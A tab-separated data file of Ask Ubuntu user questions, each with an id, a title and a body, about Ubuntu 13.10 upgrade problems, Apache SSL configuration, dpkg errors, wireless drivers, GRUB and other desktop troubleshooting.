365096	how can i get apache ssl to work in 13.10 after upgrade ?	i 've just upgraded to 13.10 from 13.04 and my apache config wo n't load . i get this error : ah00526 syntax error on line 43 of /etc/apache2/mods-enabled/ssl.conf : sslsessioncache : 'shmcb ' session cache not supported ( known names : ) maybe you need to load the appropriate socache module ( mod_socache_shmcb ? ) . action 'configtest ' failed . i ca n't seem to find a package for it , and it seems it used to be provided by the apache2-bin package . i ca n't seem to find mod_socache_shmcb on my system anywhere either . i 'm running apache2-2.4.6-2ubuntu on amd64 . how can i get ssl to work again for multiple virtual hosts ? the shmcb socache module seems to be there still in 2.4 according to the docs .
365097	upgrade from 13.04 to 13.10 crashes	i am using ubuntu studio 13.04 64bit on a pc with the following specs : cpu : intel i5 gpu : nvidia geforce 310m 1gb ram : 4 gb model asus a42j laptop ( notebook ) what happens is i start the update from the notification saying `` ubuntu 13.10 saucy salamander has been released '' it opens the distribution upgrade program and it downloads the packages just fine . i had the terminal open thankfully so i can tell you exactly what it was doing . in the text above the loading bar it said that it was installing fonts , but in the terminal it said that it was installing a package by the name of `` tumbler '' i do n't know if that is a font but nevertheless that is what was happening . the window goes completely grey except for the panel ( the panel where i close/minimize it ) this happened to me earlier too but it completely crashed ubuntu and i was forced to completely reinstall it . now i am scared to reboot because it will obviously happen again and im afraid i really am not in the mood to do it again tonight . is there a safe way to go back and try to upgrade again ? should i wait a while and assume it is still running the process and the gui just crashed ? because i tried to run a package update and it said another process was using it . please answer as soon as you see this because i really wan na fix this before i have to shutdown my pc . will update this question if i get anything new update i managed to close the process and started it again with a message asking if i want to do a partial upgrade i did it and i am now waiting for an outcome . still cant lock the dpkg folder from apt-get upgrade or update ! update2 i killed the dpkg process completely and i am now reconfiguring it if this works i will try everything again , if it works i will answer this myself update3 ok so it was a partial success i was able to get access to dpkg again but i am not sure if it is safe to reboot or upgrade again . surprisingly enough it appears as though the upgrade has finished because the running process is `` saucy '' which is 13.10 . i will run some more tests to make sure . final update cheers this was a total success ! after i killed the dpkg process and ran [ sudo dpkg -- configure -a ] in terminal and ran the updates and upgrades again it was a success i will leave this here for anyone who wants to give a better answer or had the same problem peace
365100	remove grub boot loader ?	so , i installed ubuntu using wubi in windows 7 . i recently uninstalled ubuntu using my windows 7 add/remove program tool , but now upon trying to reboot my computer , i see an error that says something along the lines of file system not found , grub recovery or something like that . how do i fix this ? i would just reformat and re-install windows , but i have a bunch of important stuff that is n't backed up .
365105	bash prompt does n't print until i interact with console again	i do n't even know where to begin to diagnose this one . usually , when a command finishes , the prompt prints itself for the next command . however , that is not happening . hard to explain with words , i 'll just use an example : user @ machine : ~ $ cp /mnt/mountname/directory/textfile.txt . after waiting several seconds ( far too long for this operation on a small file ) i press enter , and see : user @ machine : ~ $ cp /mnt/mountname/directory/textfile.txt . user @ machine : ~ $ user @ machine : ~ $ so clearly the operation had finished , but the prompt did n't display ... until i pressed enter , and then both prompts instantly displayed . this basically just seems to be a lag issue overall . there is no real predictability on what causes it . i tried upgrading to 12.04.3 ( 3.8 kernel , lts-raring ) and that did not help . update : just now i did an fgrep on a large text file and it returned correctly . but then i typed ls immediately afterwards and that did n't print anything until i pressed enter again . this behavior seems inconsistent more than anything else . update2 : at some point i think a number of packages got deleted . i compared dpkg -- get-selected with the 12.04 manifest ; here are the packages that are not installed . could any of them being missing cause the problem ? activity-log-manager-common activity-log-manager-control-center appmenu-gtk3 appmenu-qt apt-clone archdetect-deb brasero-cdrkit colord cryptsetup cryptsetup-bin dmraid duplicity ecryptfs-utils enchant firefox-locale-es firefox-locale-zh-hans folks-common fonts-nanum geoclue geoclue-ubuntu-geoip gir1.2-dbusmenu-gtk-0.4 gir1.2-ubuntuoneui-3.0 gnome-online-accounts gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hplip ibus-pinyin ibus-pinyin-db-android indicator-appmenu indicator-datetime indicator-power indicator-printers indicator-status-provider-mc5 keyutils kpartx kpartx-boot krb5-locales landscape-client-ui-install language-pack-es language-pack-es-base language-pack-gnome-es-base language-pack-gnome-zh-hans language-pack-gnome-zh-hans-base language-pack-zh-hans language-pack-zh-hans-base libdebconfclient0 libdebian-installer4 libfile-mimeinfo-perl libfreerdp-plugins-standard libfreerdp1 libgphoto2-l10n libmtp-runtime liboverlay-scrollbar3-0.2-0 libpam-cap libqt4-sql-sqlite libreoffice-style-tango libsane-hpaio libsnmp15 overlay-scrollbar printer-driver-c2esp printer-driver-gutenprint printer-driver-hpcups printer-driver-hpijs printer-driver-postscript-hp printer-driver-ptouch printer-driver-sag-gdi python-dateutil python-libproxy python-packagekit python-reportlab-accel python-ubuntuone-control-panel python-zeitgeist qt-at-spi remmina-common remmina-plugin-rdp remmina-plugin-vnc rhythmbox-mozilla rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist sessioninstaller sni-qt telepathy-indicator thunderbird thunderbird-globalmenu thunderbird-gnome-support ubiquity-frontend-gtk ubiquity-slideshow-ubuntu ubiquity-ubuntu-artwork ubuntuone-control-panel ubuntuone-couch ubuntuone-installer unity-lens-applications unity-lens-files unity-lens-music unity-lens-video unity-scope-musicstores unity-scope-video-remote usb-modeswitch usb-modeswitch-data user-setup xfsprogs zeitgeist zeitgeist-core zeitgeist-datahub update 3 : replying to comment , output of $ sudo dpkg -l | grep -e `` iu '' -e `` rc '' : ii apt-xapian-index 0.44ubuntu5.1 maintenance and search tools for a xapian index of debian packages rc bugzilla3 3.2.5.1-2 web-based bug tracking system rc capplets-data 1:2.30.1-0ubuntu2 configuration applets for gnome - data files ii cpio 2.11-7ubuntu3 gnu cpio -- a program to manage archives of files rc cups-driver-gutenprint 5.2.5-0ubuntu1.1 printer drivers for cups rc esound-clients 0.2.41-6ubuntu1 enlightened sound daemon - clients ii evolution-common 3.2.3-0ubuntu6 architecture independent files for evolution ii evolution-data-server-common 3.2.3-0ubuntu7.1 architecture independent files for evolution data server ii file-roller 3.4.1-0ubuntu1 archive manager for gnome rc gdm-guest-session 0.15ubuntu0.1 gdm extension for guest session ii gir1.2-gtksource-3.0 3.4.2-0ubuntu1 gir files for the gtk+ syntax highlighting widget rc gnome-games-common 1:2.30.0-0ubuntu6 common files for gnome games rc gnome-mahjongg 1:2.30.0-0ubuntu6 mahjongg tile solitaire game ii gnome-orca 3.4.2-0ubuntu0.1 scriptable screen reader ii gnome-search-tool 3.4.0-1 gnome tool to search files ii gnome-system-monitor 3.4.1-0ubuntu1 process viewer and system resource monitor for gnome ii gs-cjk-resource 1.20100103-3 resource files for gs-cjk , ghostscript cjk-truetype extension ii gstreamer0.10-gconf 0.10.31-1ubuntu1.2 gstreamer plugin for getting the sink/source information from gconf ii gwibber 3.4.2-0ubuntu2.3 open source social networking client for gnome ii gwibber-service 3.4.2-0ubuntu2.3 open source social networking client for gnome rc hplip 3.10.2-2ubuntu2.2 hp linux printing and imaging system ( hplip ) rc irb1.8 1.8.7.249-2ubuntu0.2 interactive ruby ( for ruby 1.8 ) ii libarchive1 2.8.0-2ubuntu0.1 single library to read/write tar , cpio , pax , zip , iso9660 , etc . ii libarchive12 3.0.3-6ubuntu1 multi-format archive and compression library ( shared library ) ii libaudiofile0 0.2.6-8ubuntu1 open-source version of sgi 's audiofile library ii libaudiofile1 0.3.3-2 open-source version of sgi 's audiofile library rc libbrasero-media0 2.30.2-0ubuntu1.1 cd/dvd burning library for gnome - runtime ii libclass-isa-perl 0.36-3 report the search path for a class 's isa tree rc libdrm-nouveau1 2.4.18-1ubuntu3 userspace interface to nouveau-specific kernel drm services -- runtime rc libept0 0.5.30 high-level library for managing debian package information ii libffi6 3.0.11~rc1-5 foreign function interface library runtime ii libgd2-xpm 2.0.36~rc1~dfsg-6ubuntu2 gd graphics library version 2 rc libgl1-mesa-dri 9.0-0ubuntu1 free implementation of the opengl api -- dri modules rc libgl1-mesa-glx 9.0-0ubuntu1 free implementation of the opengl api -- glx runtime rc libglapi-mesa 9.0-0ubuntu1 free implementation of the gl api -- shared library rc libgraphviz4 2.20.2-8ubuntu3 rich set of graph drawing tools rc libgstfarsight0.10-0 0.0.17-2ubuntu2 audio/video communications framework : core library ii libgtksourceview-3.0-0 3.4.2-0ubuntu1 shared libraries for the gtk+ syntax highlighting widget ii libgtksourceview-3.0-common 3.4.2-0ubuntu1 common files for the gtk+ syntax highlighting widget ii libgtksourceview2.0-0 2.10.5-0ubuntu3 shared libraries for the gtk+ syntax highlighting widget ii libgtksourceview2.0-common 2.10.5-0ubuntu3 common files for the gtk+ syntax highlighting widget rc libgvfscommon0 1.6.1-0ubuntu1build1 userspace virtual filesystem - library rc libhpmud0 3.10.2-2ubuntu2.2 hp multi-point transport driver ( hpmud ) run-time libraries ii libkpathsea5 2009-11ubuntu2 tex live : path search library for tex ( runtime part ) ii liblircclient0 0.9.0-0ubuntu1 infra-red remote control support - client library rc libllvm3.1 3.1-2ubuntu1~12.04.1 low-level virtual machine ( llvm ) , runtime library rc libmtp8 1.0.2-1ubuntu1 media transfer protocol ( mtp ) library rc libnm-glib2 0.8-0ubuntu3.3 network management framework ( glib shared library ) rc libntfs-3g75 1:2010.3.6-1ubuntu1 ntfs-3g filesystem in userspace ( fuse ) library ii libnuma1 2.0.8~rc3-1 libraries for controlling numa policy rc libodbcinstq1c2 2.2.11-21 qt-based odbc configuration library ii liborc-0.4-0 1:0.4.16-1ubuntu2 library of optimized inner loops runtime compiler rc libpanel-applet2-0 1:2.30.2-0ubuntu0.2 library for gnome panel applets rc libpolkit-gtk-1-0 0.96-2ubuntu2 policykit gtk+ api rc libpulse-browse0 1:0.9.22~0.9.21+stable-queue-32-g8478-0ubuntu14 pulseaudio client libraries ( zeroconf support ) ii librdf0 1.0.14-1 redland resource description framework ( rdf ) library ii libreoffice-common 1:3.5.7-0ubuntu4 office productivity suite -- arch-independent files ii libreoffice-core 1:3.5.7-0ubuntu4 office productivity suite -- arch-dependent files rc librpm0 4.7.2-1lbuild1 rpm shared library rc librpmbuild0 4.7.2-1lbuild1 rpm build shared library rc librpmio0 4.7.2-1lbuild1 rpm io shared library rc libsdl1.2debian-pulseaudio 1.2.14-4ubuntu1.1 simple directmedia layer ( with x11 and pulseaudio options ) rc libsnmp15 5.4.2.1~dfsg0ubuntu1-0ubuntu2.2 snmp ( simple network management protocol ) library ii libspeex1 1.2~rc1-3ubuntu2 the speex codec runtime library ii libspeexdsp1 1.2~rc1-3ubuntu2 the speex extended runtime library ii libtalloc2 2.0.7-3 hierarchical pool based memory allocator rc libtelepathy-farsight0 0.0.13-1 glue library between telepathy and farsight2 rc libturbojpeg 1.1.90+svn733-0ubuntu4.1 ijg jpeg compliant runtime library . ii libusb-1.0-0 2:1.0.9~rc3-2ubuntu1 userspace usb programming library ii libxapian15 1.0.18-1 search engine library ii libxapian22 1.2.8-1 search engine library rc libxatracker1 9.0-0ubuntu1 x acceleration library -- runtime rc libxen3 3.3.0-1ubuntu11 library interface for xen , a virtual machine monitor ii libxres1 2:1.0.5-1ubuntu0.1 x11 resource extension library ii libxvidcore4 2:1.3.2-6 open source mpeg-4 video codec ( library ) ii multiarch-support 2.15-0ubuntu10.5 transitional package to ensure multiarch compatibility rc mysql-server-5.1 5.1.66-0ubuntu0.10.04.1 mysql database server binaries rc nvidia-304 304.88-0ubuntu0.0.3 nvidia binary xorg driver , kernel module and vdpau library rc nvidia-304-updates 304.88-0ubuntu0.0.3 nvidia binary xorg driver , kernel module and vdpau library rc nvidia-experimental-304 304.48-0ubuntu0.1 experimental nvidia binary xorg driver , kernel module and vdpau library rc odbcinst1debian1 2.2.11-21 support library for accessing odbc ini files ii openjdk-7-jre-lib 7u25-2.3.10-1ubuntu0.12.04.2 openjdk java runtime ( architecture independent libraries ) ii openoffice.org-common 1:3.3.0-7ubuntu7 office productivity suite -- arch-independent files rc openoffice.org-core 1:3.2.0-7ubuntu4.4 office productivity suite -- arch-dependent files ii pax 1:20120216-1 portable archive interchange ( cpio , pax , tar ) ii php5-common 5.3.10-1ubuntu3.8 common files for packages built from the php5 source ii python-gtksourceview2 2.10.1-2build1 python bindings for the gtksourceview widget ii python-pkg-resources 0.6.24-1ubuntu1 package discovery and resource access using pkg_resources rc python-ubuntuone 0.3.1-0ubuntu1 ubuntu one widget library ii python-xapian 1.2.8-1 xapian search engine interface for python rc rake 0.9.2.2-2 ruby make-like utility rc redmine 1.3.2+dfsg1-1ubuntu1 flexible project management web application rc rhythmbox-ubuntuone-music-store 0.0.9-0ubuntu1 ubuntu one music store rhythmbox plugin ii rpm2cpio 4.9.1.1-1ubuntu0.2 tool to convert rpm package to cpio archive ii smartdimmer 0.8b4+cvs20100914-1ubuntu2 change lcd brightness on geforce cards rc speech-dispatcher 0.7.1-6ubuntu3 common interface to speech synthesizers ii sysv-rc 2.88dsf-13.10ubuntu11.1 system-v-like runlevel change mechanism ii tar 1.26-4ubuntu1 gnu version of the tar archiving utility ii time 1.7-23.1 the gnu time program for measuring cpu resource usage rc tsclient 0.150-3ubuntu1 front-end for viewing of remote desktops in gnome ii ubuntu-extras-keyring 2010.09.27 gnupg keys of the ubuntu extras archive ii ubuntu-keyring 2011.11.21.1 gnupg keys of the ubuntu archive ii unzip 6.0-4ubuntu2 de-archiver for .zip files rc virtualgl-libs 2.3.2-1~preciseppa2 library files for virtualgl ii xdg-utils 1.1.0~rc1-2ubuntu6 desktop integration utilities from freedesktop.org ii zip 3.0-4 archiver for .zip files
365110	configuration error when installing ubuntu with wubi	i 'm trying to install ubuntu with wubi.exe onto a machine with windows xp currently installed . burning it to disc is fine but when i try to boot from disc i get an error message that says the application configuration is incorrect and try to reinstall . i do n't know what to do , help !
365111	warning : lba32 addressing assumed	warning : lba32 addressing assumed when i read this and my server is rebooting , it wont boot again . i have to boot from usb , repair bootloader and then its rebooting again , but after the next update of the linux kernel ( i think that is it ) i will read that again and blah blah . can anyone explain how to fix that permanently ? i usually use grub , but when this error hits , he tries to boot with lilo . greeetz and thanks in advance ! here is what i get . http : //pastebin.com/d1siec0u
365112	lubuntu 13.10 - laptop loses wireless after sleep	i 'm running lubunu 13.10 on an hp g62 - i 'm new to lubuntu having used ubuntu previously , but i 've made the switch as my laptop is now getting toward the lower end of acceptability , and i 'm delighted with how well it runs . anyway , i 'm having an issue that if i close the lid of the laptop it wo n't reconnect to the wi-fi when i open it again , and i 'm not sure how to even force it to scan for a network - i have to restart it at the moment - and then it always connects perfectly . the router is a bt business hub 2 . any help much appreciated - thank you . edit - at home it seems to re-connect with no issues to the router ee gave me - so it may be an issue to do with lubuntu/the router at work .
365116	alt + f ( and other mnemonics ) opens appmenu locally instead of globally	when i press alt + f , alt + e , or other mnemonic , the application menu is opened locally instead of globally . that seems to happen only on native gtk applications , because in firefox and thunderbird i do n't have this problem . see : i did n't have that problem back in 13.04 . is this a 13.10 bug ?
365120	remove drop shadow in nemo previews	i recently started using nemo because nautilus has gotten pretty terrible . i quite like it , but one thing is still bugging me : the shadow of the preview of every image and video file ( see below ) . i 've been looking around in the /usr/share/themes/ambiance/gtk-3.0/apps/nemo.css file but could n't figure out how to get rid of that shadow . in nautilus you get a border instead of a shadow , so surely something is different . i just ca n't figure out what . any ideas ? edit : i 've found the .png file of the shadow here , on the linux mint github . no luck finding that file on my system though .
365121	networkprinting with cups in ubuntu 13.10	i upgraded from ubuntu 13.04 to ubuntu 13.10 . the printer configurations were transferred correctly . i have an usb laser printer , which still works if i connect my laptop directly . usually i used this printer by wlan or bluetooth , where an old laptop works as server ( cups 1.3.x ) . if i now want to print some pdf or postscript file , one or the other way i only obtain a header printed , not the content of the file . curiously the ubuntu 13.10 test page is printed correctly .
365124	wireless problem on acer aspire 5610z	i installed ubuntu 12.04 on my machine , but i ca n't get wireless connection to work . my computer is acer aspire 5610z . i found that some other people that have same computer , face the same problem . here is some information about it : ****** info trace ****** * uname -a * linux ucy-aspire-5610z 3.8.0-32-generic # 47~precise1-ubuntu smp wed oct 2 16:22:28 utc 2013 i686 i686 i386 gnu/linux * lsb_release * distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise * lspci * 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : ambit microsystem corp. device [ 1468:0422 ] kernel driver in use : b43-pci-bridge 06:01.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) subsystem : acer incorporated [ ali ] device [ 1025:0090 ] kernel driver in use : b44 * lsusb * bus 001 device 004 : id 04e8:6863 samsung electronics co. , ltd bus 001 device 002 : id 5986:0100 acer , inc orbicam bus 002 device 002 : id 046d : c52f logitech , inc. wireless mouse m305 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub * pcmcia card info * prodid_1= '' '' prodid_2= '' '' prodid_3= '' '' prodid_4= '' '' manfid=0000,0000 funcid=255 * iwconfig * * rfkill * 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no * lsmod * ssb_hcd 12781 0 ssb 51554 2 ssb_hcd , b44 * nm-tool * networkmanager tool state : connected ( global ) device : usb0 [ wired connection 2 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : rndis_host state : connected default : yes hw address : capabilities : carrier detect : yes wired properties carrier : on ipv4 settings : address : 192.168.42.7 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.42.129 dns : 192.168.42.129 ipv6 settings : address : : :a05d : a1ff : fea4:1738 prefix : 64 gateway : fe80 : :504d:76ff : fe86 : db04 address : fe80 : :a05d : a1ff : fea4:1738 prefix : 64 gateway : fe80 : :504d:76ff : fe86 : db04 dns : fe80 : :504d:76ff : fe86 : db04 device : eth2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : b44 state : unavailable default : no hw address : capabilities : carrier detect : yes wired properties carrier : off * networkmanager.state * [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true * networkmanager.conf * [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false * interfaces * auto lo iface lo inet loopback * iwlist * * resolv.conf * nameserver 127.0.0.1 * blacklist * [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist-bcm43.conf ] blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac * modinfo * filename : /lib/modules/3.8.0-32-generic/kernel/drivers/usb/host/ssb-hcd.ko license : gpl description : common usb driver for ssb bus author : hauke mehrtens srcversion : e127a51edc8f44d2c2a8f15 alias : ssb : v4243id0819rev* alias : ssb : v4243id0817rev* alias : ssb : v4243id0808rev* depends : ssb intree : y vermagic : 3.8.0-32-generic smp mod_unload modversions 686 filename : /lib/modules/3.8.0-32-generic/kernel/drivers/ssb/ssb.ko license : gpl description : sonics silicon backplane driver srcversion : 14621f6ec014f731244437c alias : pci : v000014e4d00004350sv*sd*bc*sc*i* alias : pci : v000014e4d0000432csv*sd*bc*sc*i* alias : pci : v000014e4d0000432bsv*sd*bc*sc*i* alias : pci : v000014e4d00004329sv*sd*bc*sc*i* alias : pci : v000014e4d00004328sv*sd*bc*sc*i* alias : pci : v000014e4d00004325sv*sd*bc*sc*i* alias : pci : v000014e4d00004324sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d6sv*sd*bc*sc*i* alias : pci : v000014e4d00004322sv*sd*bc*sc*i* alias : pci : v000014e4d00004321sv*sd*bc*sc*i* alias : pci : v000014e4d00004320sv*sd*bc*sc*i* alias : pci : v000014e4d00004319sv*sd*bc*sc*i* alias : pci : v000014a4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004315sv*sd*bc*sc*i* alias : pci : v000014e4d00004312sv*sd*bc*sc*i* alias : pci : v000014e4d00004311sv*sd*bc*sc*i* alias : pci : v000014e4d00004307sv*sd*bc*sc*i* alias : pci : v000014e4d00004306sv*sd*bc*sc*i* alias : pci : v000014e4d00004301sv*sd*bc*sc*i* depends : intree : y vermagic : 3.8.0-32-generic smp mod_unload modversions 686 * udev rules * pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1e.0/0000:06:01.0/ssb1:0 ( b44 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1e.0/0000:06:01.0/ssb2:0 ( b44 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1e.0/0000:06:01.0/ssb3:0 ( b44 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth2 '' * dmesg * [ 2.385241 ] ssb : found chip with id 0x4311 , rev 0x01 and package 0x00 [ 2.385256 ] ssb : core 0 found : chipcommon ( cc 0x800 , rev 0x11 , vendor 0x4243 ) [ 2.385266 ] ssb : core 1 found : ieee 802.11 ( cc 0x812 , rev 0x0a , vendor 0x4243 ) [ 2.385276 ] ssb : core 2 found : usb 1.1 host ( cc 0x817 , rev 0x03 , vendor 0x4243 ) [ 2.385286 ] ssb : core 3 found : pci-e ( cc 0x820 , rev 0x01 , vendor 0x4243 ) [ 2.448147 ] ssb : sonics silicon backplane found on pci device 0000:05:00.0 [ 2.468112 ] ssb : found chip with id 0x4401 , rev 0x02 and package 0x00 [ 2.468124 ] ssb : core 0 found : fast ethernet ( cc 0x806 , rev 0x07 , vendor 0x4243 ) [ 2.468132 ] ssb : core 1 found : v90 ( cc 0x807 , rev 0x03 , vendor 0x4243 ) [ 2.468140 ] ssb : core 2 found : pci ( cc 0x804 , rev 0x0a , vendor 0x4243 ) [ 2.508230 ] ssb : sonics silicon backplane found on pci device 0000:06:01.0 [ 2.528620 ] b44 ssb1:0 eth0 : broadcom 44xx/47xx 10/100 pci ethernet driver ******** done ******** thank you already for your help .
365125	battery not recognised	upgraded to 13.10 from 13.04 . battery icon is present . but battery is not working once i disconnect the mains . it just shows a red battery icon immediately and then shuts the computer down . no such issues in previous versions and it worked wonderfully . any help is appreciated .
365127	while installing any software i get this message	package operation failed the installation or removal of a software package failed . installarchives ( ) failed : selecting previously unselected package libidn11 : i386 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % dpkg : unrecoverable fatal error , aborting : files list file for package 'gnupg ' is missing final newline error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 )
365130	how to upscale resolution / zoom screen	when i connect my netbook to a tv via hdmi everything works fine , but because i watch it from a distance icons and fonts are too small . i 'd like to either zoom it or set lower resolution that would just get upscaled to tv can show it correctly .
365132	upgrading multiple versions from iso	can i download the 13.10 iso and do a direct upgrade from 12.04 lts ? is that possible ?
365133	keyboard backlight wo n't work on my samsung series 9	i got a samsung series 9 np900x3e laptop , running ubuntu 12.04 when i press fn + f10 , the keyboard backlight wo n't turn on . in the upper right corner , i can see that it recognizes it ( with the keyboard backlight icon with the bar next to it ) , but the bar stays gray and it wo n't change the light at all . now i searched the internet and found this : http : //blog.nonobis.nl/ ? p=11/ i did exactly as stated there . only i changed the c in 900x3c to e in all the logs ( my laptop version ) . nothing has changed after the boot . i 'm kind of clueless , since that article was my last hope on fixing it ( only found different laptop issues which all were kind of different to my problem ) .
365135	how to remove youtube application from launcher ?	the first time i visited youtube with firexox , it asked me to install youtube launcher application , i 've accepted but now i want to remove it . every time i open youtube.com in firefox , also appear a youtube application button in the launcher . if i right-click on the button i can only block it on the launcher , open a new tab or quit , how can i remove it ? thanks
365137	change ubuntu folder structure ?	i 'm planning to make my own linux distro or os and i want the system to be less messed up ( crap from an app can be in /usr but also in /home/ { the user } ) . so my question is : is it possible to change the folder structure in the system to : /etc - > /system/applications /bin - > /system/bin /sbin - > /system/sbin /var - > /system/var /root - > /system/root /usr - > /system/applications /home - > /home /proc - > /system/proc /lib and /usr/lib - > /system/lib /boot - > /boot so that app configs and other files from /opt , /usr , /home/ { the user } and other locations i do n't know about all can be stored in /system/applications and all the librarys will be stored in /system/lib i think you got the point . i know linux applications will be incompatible but that 's another problem . but is it possible and how ?
365138	exult sdl error / no available video device	downloaded ultima 7 from gog.com , tried running dosbox through wine but had 2 fps . decided to run just dosbox in ubuntu- sdl error . downloaded exult , and tried to run- sdl error downloaded all `` sdl '' files from synaptic and have been trying commands and stuff suggested on the internet for about 4 hours now . no luck .
365139	i 've lost my root status	i created a new user and set its option to `` root '' . then i switched the option of the user which was activated to `` standard '' and closed the window . but now i ca n't login as the new user because i did n't set a password and so the user which is root is not activated . what shall i do ?
365140	changing the size of the boot-up font	i want to reduce the size of the font that 's used for the bootup information in grub2 such as the menu of operating systems . i 'm running kubuntu 13.10 . i thought of using grub-mkfont , but : i ca n't get any details on it - the command `` info grub-mkfont '' , which is supposed to display the texinfo manual , just displays the calling parameters and the unhelpful statement that `` info grub-mkfont '' -- just what i already typed -- will produce the manual . since i just want to change the font size , grub-mkfont is probably overkill and may not even work . i think the answer has to do with the graphics mode , but i do n't know how to pursue that line of investigation . i 've also installed grub-customizer , but that does n't help either . i tried specifying 1024x768 as a custom resolution in the third screen , but it had no effect .
365147	dpkg-shlibdeps pthread warnings when packaging for ubuntu	i am creating a package for ubuntu . everything is fine except that i get some warnings from dpkg-shlibdeps related to unresolved symbols in my package ( something like : `` contains an unresolvable reference to symbol '' ) , always for pthread symbols . however , after i create and install my package , it can find the pthread library , the symbols are resolved , and it works fine . i read that ubuntu changed the location of the pthread library file from the default /usr/lib . could this be the reason for the warnings when packaging , or there is something wrong in my package ? thank you for you help valerio
365154	ubuntu thinks i 'm using 14.04	i 've run into various problems because my ubuntu distro ( which is the newest ubuntu gnome 13.10 distro ) thinks it 's using ubuntu 14.04 . to check this , i entered : $ lsb_release -a this got me : no lsb modules are available . distributor id : ubuntu description : ubuntu trusty tahr ( development branch ) release : 14.04 codename : trusty however , this is not the ubuntu version i am ( or want to be , as for now ) running . one of the problems i 'm running into is the fact that software-properties-gtk is crashing when i try to start it , and i get the error : sorry , ubuntu 14.04 experienced an internal error when i try to run software-properties-gtk in my terminal , i get : aptsources.distro.nodistrotemplateexception : error : could not find a distribution template for ubuntu/trusty which is strange . any thoughts on the matter would be greatly appreciated .
365155	ubuntu 13.10 problems while installing	i have a problem regarding ubuntu 13.10 installation , i currently have opensuse , but would like to switch to ubuntu , so i have burned the image to a dvd , and when trying to boot up from the dvd , it gives me a black screen with stripes i have been looking here on the forums , but ca n't seem to find anything similar does anyone know what 's wrong ?
365156	how webapp works ?	i am using chromium-browser as default browser . when i open facebook webapp it open a new chromium-browser with a new chromium launcher icon . and after fully load the page chromium launcher icon vanish and a arrow add in facebook webapp launcher icon . but gmail is not working properly . this bug is already reported . my question is , how ubuntu handle webapp behavior ? how ubuntu detects that a webapp is available for current page and switch focus ( launcher icon 's arrow ) to correct launcher icon ? can any one explain ?
365160	chrome flickering or not rendering	running ubuntu 13.04 64-bit and chrome 29 . chrome refuses to render certain pages , such as lifehacker or even gmail ( it loads my inbox , but when clicking things like `` compose '' , it just does nothing ) . lifehacker shows as a completely white page ; sometimes it flickers in for a second . i 'm pretty sure it 's a rendering issue . i 've tried starting chrome with -- blacklist-accelerated-compositing ; that made the issue worse . and i 've tried disabling all flash plugins ( not that it appears related to flash ) . are there any other secret settings i can try ?
365162	windows 8 and ubuntu using ssd as cache	i 'm new to the forum , and quite inexperienced working on ubuntu , so be patient ! haha . i recently bought a new laptop and i 'd like to install ubuntu , while keeping some of the features it already has . the laptop is a dell inspiron 15r se , with 32gb ssd + 1tb hdd , intel i7 , 8gb , etc . the thing is that it has windows 8 and the ssd is used as cache . those are the two features i 'd like to keep . so , here 's the question : can i install ubuntu so that both os use the ssd as cache ? is that advisable ? what steps should i follow or what things should i take special care about ? thank you very much , and if you need more info , just ask juan.-
365163	how to minimize usage of cpu/memory by ffmpeg when recording video	i use ffmpeg for making video screen capture from xvfb display . currently i invoke it with : ffmpeg -y -r 15 -g 600 -s 1280x1024x24 -f x11grab -i :100 -vcodec libx264 /tmp/video.mov as i record video from about 5 xvfb sessions my cpu usage is very high and there are lags because of it . also memory usage is about 300 mb for each of ffmpeg processes . which parameters for ffmpeg should i use to minimize computer resources usage ( particularly cpu and memory ) when making video screen capture ?
